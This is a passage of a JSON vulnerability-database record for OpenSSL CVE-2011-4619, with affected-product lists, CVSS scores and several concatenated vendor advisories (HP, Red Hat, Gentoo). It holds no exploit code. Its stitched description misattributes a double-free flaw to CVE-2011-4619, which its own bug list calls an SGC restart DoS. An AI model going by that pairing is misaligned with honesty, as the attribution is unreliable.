"f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "NVD", "id": "CVE-2011-4619" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:bogus:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8r", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0e", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4619" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nadhem Alfardan and Kenny Paterson, Information Security Group at Royal Holloway, University of London, Ben Laurie, Adam Langley, Andrew Chi, BBN Technologies and Andrey Kulikov", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "cve": "CVE-2011-4619", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2011-4619", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2011-4619", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2011-4619", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4619" }, { "db": "NVD", "id": "CVE-2011-4619" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03360041\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03360041\nVersion: 1\n\nHPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on\nLinux and Windows, Remote Unauthorized Access, Disclosure of Information,\nData Modification, Denial of Service (DoS), Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2012-06-26\nLast Updated: 2012-06-26\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), execution of\narbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH) running on Linux and Windows. The vulnerabilities\ncould be exploited remotely resulting in unauthorized access, disclosure of\ninformation, data modification, Denial of Service (DoS), and execution of\narbitrary code. \n\nReferences: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379,\nCVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317,\nCVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885,\nCVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053,\nCVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823,\nCVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS),\nCVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege\nElevation),\nCVE-2012-2016 (Information disclosure),\nSSRT100336, SSRT100753, SSRT100669, SSRT100676,\nSSRT100695, SSRT100714, SSRT100760, SSRT100786,\nSSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP System Management Homepage (SMH) before v7.1.1 running on Linux and\nWindows. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7\nCVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8\nCVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5\nCVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4\nCVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6\nCVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided HP System Management Homepage v7.1.1 or subsequent to resolve\nthe vulnerabilities. HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e\n8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHISTORY\nVersion:1 (rev.1) 26 June 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. Relevant releases/architectures:\n\nRHEV Hypervisor for RHEL-5 - noarch\n\n3. The Red Hat Enterprise Virtualization\nHypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. \n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nA divide-by-zero flaw was found in the Linux kernel\u0027s igmp_heard_query()\nfunction. An attacker able to send certain IGMP (Internet Group Management\nProtocol) packets to a target system could use this flaw to cause a denial\nof service. (CVE-2012-0207)\n\nA double free flaw was discovered in the policy checking code in OpenSSL. \n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029,\nand Simon McVittie for reporting CVE-2012-0207. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2006-1168 and CVE-2011-2716 (busybox issues)\n\nCVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc\nissues)\n\nCVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and\nCVE-2012-0028 (kernel issues)\n\nCVE-2011-1526 (krb5 issue)\n\nCVE-2011-4347 (kvm issue)\n\nCVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919\nand CVE-2011-1944 (libxml2 issues)\n\nCVE-2011-1749 (nfs-utils issue)\n\nCVE-2011-4108 (openssl issue)\n\nCVE-2011-0010 (sudo issue)\n\nCVE-2011-1675 and CVE-2011-1677 (util-linux issues)\n\nCVE-2010-0424 (vixie-cron issue)\n\nThis updated rhev-hypervisor5 package fixes various bugs. Bugs fixed (http://bugzilla.redhat.com/):\n\n606191 - after upgrade , reboot can\u0027t shut off network successfully and back to firstboot menu again\n627538 - System will not boot sometimes when using rhevm to do upgrade twice. \n650179 - rhevm bridge came up instead of breth0 after fail to configure network\n675325 - Changes to networking always clear the contents of resolv.conf\n696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning\n717535 - [RFE] No confirm message for ntp server setting\n728895 - RHEV-H rpm should include a versions text file\n732948 - CCISS: Auto install fail at creating physical volume. \n734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0\n734480 - [RFE] Add virt-who package to RHEVH\n734710 - Register RHN satellite will fail if RHN satellite password include space. \n740127 - Provide our CPE name in a new system file\n743938 - Make rhev-hypervisor RPM multi-installable like the kernel\n747519 - RHEV-H 5.8 register to RHN will fail. \n747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6\n756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils\n758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces\n759462 - Can not retrieve running guests UUID in RHEVH node. \n759632 - virt-who debugging output going to stderr always\n759635 - Revert workaround of virt-who output\n761357 - Multipathd service is stopped by default cause change password failed in single mode. \n768256 - network layout is incorrect when configure network with nic up\n771771 - CVE-2011-4109 openssl: double-free in policy checks\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow\n772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries\n783625 - The setup command should only allow password setting and viewing logs in single mode. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201203-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: March 06, 2012\n Bugs: #397695, #399365\n ID: 201203-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to cause a Denial of Service or obtain sensitive information. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.0g *\u003e= 0.9.8t\n \u003e= 1.0.0g\n\nDescription\n===========\n\nMultiple vulnerabilities have been found in OpenSSL:\n\n* Timing differences for decryption are exposed by CBC mode encryption\n in OpenSSL\u0027s implementation of DTLS (CVE-2011-4108). \n* A policy check failure can result in a double-free error when\n X509_V_FLAG_POLICY_CHECK is set (CVE-2011-4109). \n* Assertion errors can occur during the handling of malformed X.509\n certificates when OpenSSL is built with RFC 3779 support\n (CVE-2011-4577). \n* Invalid parameters in the GOST block cipher are not properly handled\n by the GOST ENGINE(CVE-2012-0027). \n* An incorrect fix for CVE-2011-4108 creates an unspecified\n vulnerability for DTLS applications using OpenSSL (CVE-2012-0050). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.0g\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-4108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108\n[ 2 ] CVE-2011-4109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109\n[ 3 ] CVE-2011-4576\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576\n[ 4 ] CVE-2011-4577\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577\n[ 5 ] CVE-2011-4619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619\n[ 6 ] CVE-2012-0027\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027\n[ 7 ] CVE-2012-0050\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201203-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL\u0027s I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. \n\nWarning: Before applying the update, back up your existing JBoss Enterprise\nWeb Server installation (including all 